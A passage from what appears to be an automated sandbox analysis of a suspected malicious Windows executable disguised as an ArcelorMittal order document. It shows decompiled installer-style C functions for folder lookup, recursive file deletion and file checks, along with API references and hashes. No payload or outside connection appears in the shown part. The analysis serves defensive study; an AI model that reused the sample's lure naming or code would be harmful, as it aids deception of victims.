                                                              					if((_t114 - _t49 & 0xfffffffe) >= 0x800) {
                                                              						break;
                                                              					}
                                                              					_t98 = 2;
                                                              					_t89 = _t89 + _t98;
                                                              					__eflags = _t109 - 4;
                                                              					_v8 = _t89;
                                                              					if(__eflags >= 0) {
                                                              						if(__eflags != 0) {
                                                              							 *_t114 = _t109;
                                                              							_t114 = _t114 + _t98;
                                                              							__eflags = _t114;
                                                              						} else {
                                                              							 *_t114 =  *_t89;
                                                              							_t114 = _t114 + _t98;
                                                              							_t89 = _t89 + _t98;
                                                              						}
                                                              						continue;
                                                              					}
                                                              					_t51 =  *((intOrPtr*)(_t89 + 1));
                                                              					_t90 =  *_t89;
                                                              					_v8 = _v8 + 2;
                                                              					_t85 = _t90 & 0x000000ff;
                                                              					_t52 = _t51 & 0x000000ff;
                                                              					_a8 = (_t51 & 0x0000007f) << 0x00000007 | _t90 & 0x0000007f;
                                                              					_v16 = _t52;
                                                              					_t53 = _t52 | 0x00008000;
                                                              					__eflags = _t109 - 2;
                                                              					_v24 = _t85;
                                                              					_v28 = _t85 | 0x00008000;
                                                              					_v20 = _t53;
                                                              					if(_t109 != 2) {
                                                              						__eflags = _t109 - 3;
                                                              						if(_t109 != 3) {
                                                              							__eflags = _t109 - 1;
                                                              							if(_t109 == 1) {
                                                              								__eflags = (_t53 | 0xffffffff) - _a8;
                                                              								E00406054(_t85, _t109, _t114, _t114, (_t53 | 0xffffffff) - _a8);
                                                              							}
                                                              							L42:
                                                              							_t54 = lstrlenW(_t114);
                                                              							_t89 = _v8;
                                                              							_t114 =  &(_t114[_t54]);
                                                              							_t49 = 0x7a69e0;
                                                              							continue;
                                                              						}
                                                              						__eflags = _a8 - 0x1d;
                                                              						if(_a8 != 0x1d) {
                                                              							__eflags = (_a8 << 0xb) + 0x7a9000;
                                                              							E00406032(_t114, (_a8 << 0xb) + 0x7a9000);
                                                              						} else {
                                                              							E00405F79(_t114,  *0x7a8a48);
                                                              						}
                                                              						__eflags = _a8 + 0xffffffeb - 7;
                                                              						if(_a8 + 0xffffffeb < 7) {
                                                              							L33:
                                                              							E004062C6(_t114);
                                                              						}
                                                              						goto L42;
                                                              					}
                                                              					_t112 = 2;
                                                              					_t66 = GetVersion();
                                                              					__eflags = _t66;
                                                              					if(_t66 >= 0) {
                                                              						L13:
                                                              						_a8 = 1;
                                                              						L14:
                                                              						__eflags =  *0x7a8ac4;
                                                              						if( *0x7a8ac4 != 0) {
                                                              							_t112 = 4;
                                                              						}
                                                              						__eflags = _t85;
                                                              						if(_t85 >= 0) {
                                                              							__eflags = _t85 - 0x25;
                                                              							if(_t85 != 0x25) {
                                                              								__eflags = _t85 - 0x24;
                                                              								if(_t85 == 0x24) {
                                                              									GetWindowsDirectoryW(_t114, 0x400);
                                                              									_t112 = 0;
                                                              								}
                                                              								while(1) {
                                                              									__eflags = _t112;
                                                              									if(_t112 == 0) {
                                                              										goto L30;
                                                              									}
                                                              									_t67 =  *0x7a8a44;
                                                              									_t112 = _t112 - 1;
                                                              									__eflags = _t67;
                                                              									if(_t67 == 0) {
                                                              										L26:
                                                              										_t69 = SHGetSpecialFolderLocation( *0x7a8a48,  *(_t116 + _t112 * 4 - 0x18),  &_v12);
                                                              										__eflags = _t69;
                                                              										if(_t69 != 0) {
                                                              											L28:
                                                              											 *_t114 =  *_t114 & 0x00000000;
                                                              											__eflags =  *_t114;
                                                              											continue;
                                                              										}
                                                              										__imp__SHGetPathFromIDListW(_v12, _t114);
                                                              										__imp__CoTaskMemFree(_v12);
                                                              										__eflags = _t69;
                                                              										if(_t69 != 0) {
                                                              											goto L30;
                                                              										}
                                                              										goto L28;
                                                              									}
                                                              									__eflags = _a8;
                                                              									if(_a8 == 0) {
                                                              										goto L26;
                                                              									}
                                                              									_t71 =  *_t67( *0x7a8a48,  *(_t116 + _t112 * 4 - 0x18), 0, 0, _t114); // executed
                                                              									__eflags = _t71;
                                                              									if(_t71 == 0) {
                                                              										goto L30;
                                                              									}
                                                              									goto L26;
                                                              								}
                                                              								goto L30;
                                                              							}
                                                              							GetSystemDirectoryW(_t114, 0x400);
                                                              							goto L30;
                                                              						} else {
                                                              							_t87 = _t85 & 0x0000003f;
                                                              							E00405EFF(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8a78 + (_t85 & 0x0000003f) * 2, _t114, _t85 & 0x00000040); // executed
                                                              							__eflags =  *_t114;
                                                              							if( *_t114 != 0) {
                                                              								L31:
                                                              								__eflags = _v16 - 0x1a;
                                                              								if(_v16 == 0x1a) {
                                                              									lstrcatW(_t114, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                              								}
                                                              								goto L33;
                                                              							}
                                                              							E00406054(_t87, _t112, _t114, _t114, _v16);
                                                              							L30:
                                                              							__eflags =  *_t114;
                                                              							if( *_t114 == 0) {
                                                              								goto L33;
                                                              							}
                                                              							goto L31;
                                                              						}
                                                              					}
                                                              					__eflags = _t66 - 0x5a04;
                                                              					if(_t66 == 0x5a04) {
                                                              						goto L13;
                                                              					}
                                                              					__eflags = _v16 - 0x23;
                                                              					if(_v16 == 0x23) {
                                                              						goto L13;
                                                              					}
                                                              					__eflags = _v16 - 0x2e;
                                                              					if(_v16 == 0x2e) {
                                                              						goto L13;
                                                              					} else {
                                                              						_a8 = _a8 & 0x00000000;
                                                              						goto L14;
                                                              					}
                                                              				}
                                                              				 *_t114 =  *_t114 & 0x00000000;
                                                              				if(_a4 == 0) {
                                                              					return _t49;
                                                              				}
                                                              				return E00406032(_a4, _t49);
                                                              			}































                                                              0x00406054
                                                              0x00406054
                                                              0x00406054
                                                              0x0040605a
                                                              0x0040605f
                                                              0x00406061
                                                              0x00406070
                                                              0x00406070
                                                              0x00406078
                                                              0x00406079
                                                              0x0040607a
                                                              0x0040607b
                                                              0x0040607e
                                                              0x00406086
                                                              0x00406088
                                                              0x004060a1
                                                              0x004060a4
                                                              0x004060a4
                                                              0x004062a0
                                                              0x004062a0
                                                              0x004062a6
                                                              0x00000000
                                                              0x00000000
                                                              0x004060b4
                                                              0x004060ba
                                                              0x00000000
                                                              0x00000000
                                                              0x004060c2
                                                              0x004060c3
                                                              0x004060c5
                                                              0x004060c9
                                                              0x004060cc
                                                              0x0040628d
                                                              0x0040629b
                                                              0x0040629e
                                                              0x0040629e
                                                              0x0040628f
                                                              0x00406292
                                                              0x00406295
                                                              0x00406297
                                                              0x00406297
                                                              0x00000000
                                                              0x0040628d
                                                              0x004060d2
                                                              0x004060d5
                                                              0x004060e4
                                                              0x004060ea
                                                              0x004060ed
                                                              0x004060f0
                                                              0x004060fa
                                                              0x004060ff
                                                              0x00406101
                                                              0x00406105
                                                              0x00406108
                                                              0x0040610b
                                                              0x0040610e
                                                              0x0040622e
                                                              0x00406232
                                                              0x00406267
                                                              0x0040626b
                                                              0x00406270
                                                              0x00406275
                                                              0x00406275
                                                              0x0040627a
                                                              0x0040627b
                                                              0x00406280
                                                              0x00406283
                                                              0x00406286
                                                              0x00000000
                                                              0x00406286
                                                              0x00406234
                                                              0x00406238
                                                              0x0040624e
                                                              0x00406255
                                                              0x0040623a
                                                              0x00406241
                                                              0x00406241
                                                              0x00406260
                                                              0x00406263
                                                              0x00406226
                                                              0x00406227
                                                              0x00406227
                                                              0x00000000
                                                              0x00406263
                                                              0x00406116
                                                              0x00406117
                                                              0x0040611d
                                                              0x0040611f
                                                              0x00406139
                                                              0x00406139
                                                              0x00406140
                                                              0x00406140
                                                              0x00406147
                                                              0x0040614b
                                                              0x0040614b
                                                              0x0040614c
                                                              0x0040614e
                                                              0x0040618a
                                                              0x0040618d
                                                              0x0040619d
                                                              0x004061a0
                                                              0x004061a8
                                                              0x004061ae
                                                              0x004061ae
                                                              0x0040620b
                                                              0x0040620b
                                                              0x0040620d
                                                              0x00000000
                                                              0x00000000
                                                              0x004061b2
                                                              0x004061b9
                                                              0x004061ba
                                                              0x004061bc
                                                              0x004061d6
                                                              0x004061e4
                                                              0x004061ea
                                                              0x004061ec
                                                              0x00406207
                                                              0x00406207
                                                              0x00406207
                                                              0x00000000
                                                              0x00406207
                                                              0x004061f2
                                                              0x004061fd
                                                              0x00406203
                                                              0x00406205
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406205
                                                              0x004061be
                                                              0x004061c1
                                                              0x00000000
                                                              0x00000000
                                                              0x004061d0
                                                              0x004061d2
                                                              0x004061d4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004061d4
                                                              0x00000000
                                                              0x0040620b
                                                              0x00406195
                                                              0x00000000
                                                              0x00406150
                                                              0x00406152
                                                              0x0040616d
                                                              0x00406172
                                                              0x00406176
                                                              0x00406215
                                                              0x00406215
                                                              0x00406219
                                                              0x00406221
                                                              0x00406221
                                                              0x00000000
                                                              0x00406219
                                                              0x00406180
                                                              0x0040620f
                                                              0x0040620f
                                                              0x00406213
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406213
                                                              0x0040614e
                                                              0x00406121
                                                              0x00406125
                                                              0x00000000
                                                              0x00000000
                                                              0x00406127
                                                              0x0040612b
                                                              0x00000000
                                                              0x00000000
                                                              0x0040612d
                                                              0x00406131
                                                              0x00000000
                                                              0x00406133
                                                              0x00406133
                                                              0x00000000
                                                              0x00406133
                                                              0x00406131
                                                              0x004062ac
                                                              0x004062b7
                                                              0x004062c3
                                                              0x004062c3
                                                              0x00000000

                                                              APIs
                                                              • GetVersion.KERNEL32(00000000,007A0F20,?,004051C8,007A0F20,00000000,00000000,007924F8), ref: 00406117
                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406195
                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061A8
                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061E4
                                                              • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004061F2
                                                              • CoTaskMemFree.OLE32(?), ref: 004061FD
                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406221
                                                              • lstrlenW.KERNEL32(Call,00000000,007A0F20,?,004051C8,007A0F20,00000000,00000000,007924F8), ref: 0040627B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                              • API String ID: 900638850-1230650788
                                                              • Opcode ID: 519102f416aae0167fe6a80eec88ce99d0a43be55d541feb02f87bd9ea180c8d
                                                              • Instruction ID: 54f449c5e60a038f814dd9badb8d8d01ca624a198295cd2e3a2f801cab414967
                                                              • Opcode Fuzzy Hash: 519102f416aae0167fe6a80eec88ce99d0a43be55d541feb02f87bd9ea180c8d
                                                              • Instruction Fuzzy Hash: A3610271A00105ABDF20AF68CD40AAE37A4BF51314F12C17FE953BA2D1D67D8AA1CB4D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 692 405823-405849 call 405aee 695 405862-405869 692->695 696 40584b-40585d DeleteFileW 692->696 698 40586b-40586d 695->698 699 40587c-40588c call 406032 695->699 697 4059df-4059e3 696->697 700 405873-405876 698->700 701 40598d-405992 698->701 707 40589b-40589c call 405a32 699->707 708 40588e-405899 lstrcatW 699->708 700->699 700->701 701->697 704 405994-405997 701->704 705 4059a1-4059a9 call 406375 704->705 706 405999-40599f 704->706 705->697 716 4059ab-4059bf call 4059e6 call 4057db 705->716 706->697 710 4058a1-4058a5 707->710 708->710 712 4058b1-4058b7 lstrcatW 710->712 713 4058a7-4058af 710->713 715 4058bc-4058d8 lstrlenW FindFirstFileW 712->715 713->712 713->715 717 405982-405986 715->717 718 4058de-4058e6 715->718 732 4059c1-4059c4 716->732 733 4059d7-4059da call 405191 716->733 717->701 723 405988 717->723 720 405906-40591a call 406032 718->720 721 4058e8-4058f0 718->721 734 405931-40593c call 4057db 720->734 735 40591c-405924 720->735 724 4058f2-4058fa 721->724 725 405965-405975 FindNextFileW 721->725 723->701 724->720 728 4058fc-405904 724->728 725->718 731 40597b-40597c FindClose 725->731 728->720 728->725 731->717 732->706 737 4059c6-4059d5 call 405191 call 405ed3 732->737 733->697 743 40595d-405960 call 405191 734->743 744 40593e-405941 734->744 735->725 738 405926-40592f call 405823 735->738 737->697 738->725 743->725 747 405943-405953 call 405191 call 405ed3 744->747 748 405955-40595b 744->748 747->725 748->725
                                                              C-Code - Quality: 98%
                                                              			E00405823(void* __eflags, signed int _a4, signed int _a8) {
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				short _v556;
                                                              				short _v558;
                                                              				struct _WIN32_FIND_DATAW _v604;
                                                              				signed int _t38;
                                                              				signed int _t52;
                                                              				signed int _t55;
                                                              				signed int _t62;
                                                              				void* _t64;
                                                              				signed char _t65;
                                                              				WCHAR* _t66;
                                                              				void* _t67;
                                                              				WCHAR* _t68;
                                                              				void* _t70;
                                                              
                                                              				_t65 = _a8;
                                                              				_t68 = _a4;
                                                              				_v8 = _t65 & 0x00000004;
                                                              				_t38 = E00405AEE(__eflags, _t68);
                                                              				_v12 = _t38;
                                                              				if((_t65 & 0x00000008) != 0) {
                                                              					_t62 = DeleteFileW(_t68); // executed
                                                              					asm("sbb eax, eax");
                                                              					_t64 =  ~_t62 + 1;
                                                              					 *0x7a8ac8 =  *0x7a8ac8 + _t64;
                                                              					return _t64;
                                                              				}
                                                              				_a4 = _t65;
                                                              				_t8 =  &_a4;
                                                              				 *_t8 = _a4 & 0x00000001;
                                                              				__eflags =  *_t8;
                                                              				if( *_t8 == 0) {
                                                              					L5:
                                                              					E00406032(0x7a3f48, _t68);
                                                              					__eflags = _a4;
                                                              					if(_a4 == 0) {
                                                              						E00405A32(_t68);
                                                              					} else {
                                                              						lstrcatW(0x7a3f48, L"\\*.*");
                                                              					}
                                                              					__eflags =  *_t68;
                                                              					if( *_t68 != 0) {
                                                              						L10:
                                                              						lstrcatW(_t68, 0x40a014);
                                                              						L11:
                                                              						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                              						_t38 = FindFirstFileW(0x7a3f48,  &_v604);
                                                              						_t70 = _t38;
                                                              						__eflags = _t70 - 0xffffffff;
                                                              						if(_t70 == 0xffffffff) {
                                                              							L26:
                                                              							__eflags = _a4;
                                                              							if(_a4 != 0) {
                                                              								_t30 = _t66 - 2;
                                                              								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                              								__eflags =  *_t30;
                                                              							}
                                                              							goto L28;
                                                              						} else {
                                                              							goto L12;
                                                              						}
                                                              						do {
                                                              							L12:
                                                              							__eflags = _v604.cFileName - 0x2e;
                                                              							if(_v604.cFileName != 0x2e) {
                                                              								L16:
                                                              								E00406032(_t66,  &(_v604.cFileName));
                                                              								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                              								if(__eflags == 0) {
                                                              									_t52 = E004057DB(__eflags, _t68, _v8);
                                                              									__eflags = _t52;
                                                              									if(_t52 != 0) {
                                                              										E00405191(0xfffffff2, _t68);
                                                              									} else {
                                                              										__eflags = _v8 - _t52;
                                                              										if(_v8 == _t52) {
                                                              											 *0x7a8ac8 =  *0x7a8ac8 + 1;
                                                              										} else {
                                                              											E00405191(0xfffffff1, _t68);
                                                              											E00405ED3(_t67, _t68, 0);
                                                              										}
                                                              									}
                                                              								} else {
                                                              									__eflags = (_a8 & 0x00000003) - 3;
                                                              									if(__eflags == 0) {
                                                              										E00405823(__eflags, _t68, _a8);
                                                              									}
                                                              								}
                                                              								goto L24;
                                                              							}
                                                              							__eflags = _v558;
                                                              							if(_v558 == 0) {
                                                              								goto L24;
                                                              							}
                                                              							__eflags = _v558 - 0x2e;
                                                              							if(_v558 != 0x2e) {
                                                              								goto L16;
                                                              							}
                                                              							__eflags = _v556;
                                                              							if(_v556 == 0) {
                                                              								goto L24;
                                                              							}
                                                              							goto L16;
                                                              							L24:
                                                              							_t55 = FindNextFileW(_t70,  &_v604);
                                                              							__eflags = _t55;
                                                              						} while (_t55 != 0);
                                                              						_t38 = FindClose(_t70);
                                                              						goto L26;
                                                              					}
                                                              					__eflags =  *0x7a3f48 - 0x5c;
                                                              					if( *0x7a3f48 != 0x5c) {
                                                              						goto L11;
                                                              					}
                                                              					goto L10;
                                                              				} else {
                                                              					__eflags = _t38;
                                                              					if(_t38 == 0) {
                                                              						L28:
                                                              						__eflags = _a4;
                                                              						if(_a4 == 0) {
                                                              							L36:
                                                              							return _t38;
                                                              						}
                                                              						__eflags = _v12;
                                                              						if(_v12 != 0) {
                                                              							_t38 = E00406375(_t68);
                                                              							__eflags = _t38;
                                                              							if(_t38 == 0) {
                                                              								goto L36;
                                                              							}
                                                              							E004059E6(_t68);
                                                              							_t38 = E004057DB(__eflags, _t68, _v8 | 0x00000001);
                                                              							__eflags = _t38;
                                                              							if(_t38 != 0) {
                                                              								return E00405191(0xffffffe5, _t68);
                                                              							}
                                                              							__eflags = _v8;
                                                              							if(_v8 == 0) {
                                                              								goto L30;
                                                              							}
                                                              							E00405191(0xfffffff1, _t68);
                                                              							return E00405ED3(_t67, _t68, 0);
                                                              						}
                                                              						L30:
                                                              						 *0x7a8ac8 =  *0x7a8ac8 + 1;
                                                              						return _t38;
                                                              					}
                                                              					__eflags = _t65 & 0x00000002;
                                                              					if((_t65 & 0x00000002) == 0) {
                                                              						goto L28;
                                                              					}
                                                              					goto L5;
                                                              				}
                                                              			}


















                                                              0x0040582d
                                                              0x00405832
                                                              0x0040583b
                                                              0x0040583e
                                                              0x00405846
                                                              0x00405849
                                                              0x0040584c
                                                              0x00405854
                                                              0x00405856
                                                              0x00405857
                                                              0x00000000
                                                              0x00405857
                                                              0x00405862
                                                              0x00405865
                                                              0x00405865
                                                              0x00405865
                                                              0x00405869
                                                              0x0040587c
                                                              0x00405883
                                                              0x00405888
                                                              0x0040588c
                                                              0x0040589c
                                                              0x0040588e
                                                              0x00405894
                                                              0x00405894
                                                              0x004058a1
                                                              0x004058a5
                                                              0x004058b1
                                                              0x004058b7
                                                              0x004058bc
                                                              0x004058c2
                                                              0x004058cd
                                                              0x004058d3
                                                              0x004058d5
                                                              0x004058d8
                                                              0x00405982
                                                              0x00405982
                                                              0x00405986
                                                              0x00405988
                                                              0x00405988
                                                              0x00405988
                                                              0x00405988
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004058de
                                                              0x004058de
                                                              0x004058de
                                                              0x004058e6
                                                              0x00405906
                                                              0x0040590e
                                                              0x00405913
                                                              0x0040591a
                                                              0x00405935
                                                              0x0040593a
                                                              0x0040593c
                                                              0x00405960
                                                              0x0040593e
                                                              0x0040593e
                                                              0x00405941
                                                              0x00405955
                                                              0x00405943
                                                              0x00405946
                                                              0x0040594e
                                                              0x0040594e
                                                              0x00405941
                                                              0x0040591c
                                                              0x00405922
                                                              0x00405924
                                                              0x0040592a
                                                              0x0040592a
                                                              0x00405924
                                                              0x00000000
                                                              0x0040591a
                                                              0x004058e8
                                                              0x004058f0
                                                              0x00000000
                                                              0x00000000
                                                              0x004058f2
                                                              0x004058fa
                                                              0x00000000
                                                              0x00000000
                                                              0x004058fc
                                                              0x00405904
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405965
                                                              0x0040596d
                                                              0x00405973
                                                              0x00405973
                                                              0x0040597c
                                                              0x00000000
                                                              0x0040597c
                                                              0x004058a7
                                                              0x004058af
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040586b
                                                              0x0040586b
                                                              0x0040586d
                                                              0x0040598d
                                                              0x0040598f
                                                              0x00405992
                                                              0x004059e3
                                                              0x004059e3
                                                              0x004059e3
                                                              0x00405994
                                                              0x00405997
                                                              0x004059a2
                                                              0x004059a7
                                                              0x004059a9
                                                              0x00000000
                                                              0x00000000
                                                              0x004059ac
                                                              0x004059b8
                                                              0x004059bd
                                                              0x004059bf
                                                              0x00000000
                                                              0x004059da
                                                              0x004059c1
                                                              0x004059c4
                                                              0x00000000
                                                              0x00000000
                                                              0x004059c9
                                                              0x00000000
                                                              0x004059d0
                                                              0x00405999
                                                              0x00405999
                                                              0x00000000
                                                              0x00405999
                                                              0x00405873
                                                              0x00405876
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405876

                                                              APIs
                                                              • DeleteFileW.KERNELBASE(?,?,762E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 0040584C
                                                              • lstrcatW.KERNEL32(007A3F48,\*.*), ref: 00405894
                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 004058B7
                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F48,?,?,762E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 004058BD
                                                              • FindFirstFileW.KERNEL32(007A3F48,?,?,?,0040A014,?,007A3F48,?,?,762E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 004058CD
                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 0040596D
                                                              • FindClose.KERNEL32(00000000), ref: 0040597C
                                                              Strings
                                                              • H?z, xrefs: 0040587C
                                                              • \*.*, xrefs: 0040588E
                                                              • "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", xrefs: 0040582C
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405830
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                              • String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$C:\Users\user\AppData\Local\Temp\$H?z$\*.*
                                                              • API String ID: 2035342205-3273245650
                                                              • Opcode ID: b12d6577bcbfee63c8f1005f00baa83bc0992cbcdb087d25710020cb5acef1ed
                                                              • Instruction ID: 14cb3427b362c018eba3739e9bf11da3c0c9d0e64928a5d047ed163a808d7245
                                                              • Opcode Fuzzy Hash: b12d6577bcbfee63c8f1005f00baa83bc0992cbcdb087d25710020cb5acef1ed
                                                              • Instruction Fuzzy Hash: 5441C271800A14FACB21AB658C89BAF7778EF42724F24817BF801B11D1D77C4995DEAE
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00406375(WCHAR* _a4) {
                                                              				void* _t2;
                                                              
                                                              				_t2 = FindFirstFileW(_a4, 0x7a4f90); // executed
                                                              				if(_t2 == 0xffffffff) {
                                                              					return 0;
                                                              				}
                                                              				FindClose(_t2);
                                                              				return 0x7a4f90;
                                                              			}




                                                              0x00406380
                                                              0x00406389
                                                              0x00000000
                                                              0x00406396
                                                              0x0040638c
                                                              0x00000000

                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,007A4F90,C:\Users\user\AppData\Local\Temp\nspD224.tmp,00405B37,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp, 4.v,?,C:\Users\user\AppData\Local\Temp\,00405843,?,762E3420,C:\Users\user\AppData\Local\Temp\), ref: 00406380
                                                              • FindClose.KERNEL32(00000000), ref: 0040638C
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\nspD224.tmp, xrefs: 00406375
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nspD224.tmp
                                                              • API String ID: 2295610775-89864070
                                                              • Opcode ID: 8868b6a2426bb8f5e231bf1a7a7d8febf10f258da88ac185063839d851748521
                                                              • Instruction ID: 3fb5690f441cb67cce8948cff85e4bd0b52f5f4d7afbd4cfaa78c2f4b78b622c
